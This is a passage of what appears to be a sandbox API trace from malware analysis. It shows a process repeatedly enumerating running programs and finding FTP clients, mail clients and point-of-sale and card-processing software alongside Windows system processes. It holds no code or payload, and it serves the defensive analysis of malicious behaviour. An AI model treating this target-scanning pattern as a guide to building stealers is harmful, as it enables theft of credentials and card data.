th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.174] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0249.176] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0249.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0249.178] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0249.180] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0249.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0249.186] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0249.187] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0249.189] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0249.190] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0249.192] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0249.193] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0249.195] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0249.196] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0249.230] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0249.232] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0249.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0249.235] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0249.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0249.238] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0249.240] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0249.241] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0249.243] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0249.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0249.246] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0249.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0249.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0249.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0249.256] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0249.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0249.259] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0249.263] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0249.265] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0249.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0249.268] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0249.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0249.272] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0249.273] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0249.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0249.296] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0249.297] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0249.299] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0249.301] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0249.302] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0249.304] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0249.305] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0249.311] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0249.312] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0249.314] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0249.316] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0249.317] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0249.319] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0249.320] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0249.322] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0249.326] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0249.328] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0249.330] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0249.331] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0249.333] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0249.334] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0249.336] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0249.337] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0249.390] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0249.392] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0249.393] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0249.395] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.397] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.398] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.400] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0249.405] CloseHandle (hObject=0x1018) returned 1 [0249.405] Sleep (dwMilliseconds=0x64) [0249.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0249.577] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.579] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.580] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.581] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.583] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.584] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.586] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.587] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.588] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.593] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.594] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.596] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.597] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.598] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.600] Process32Next (in: 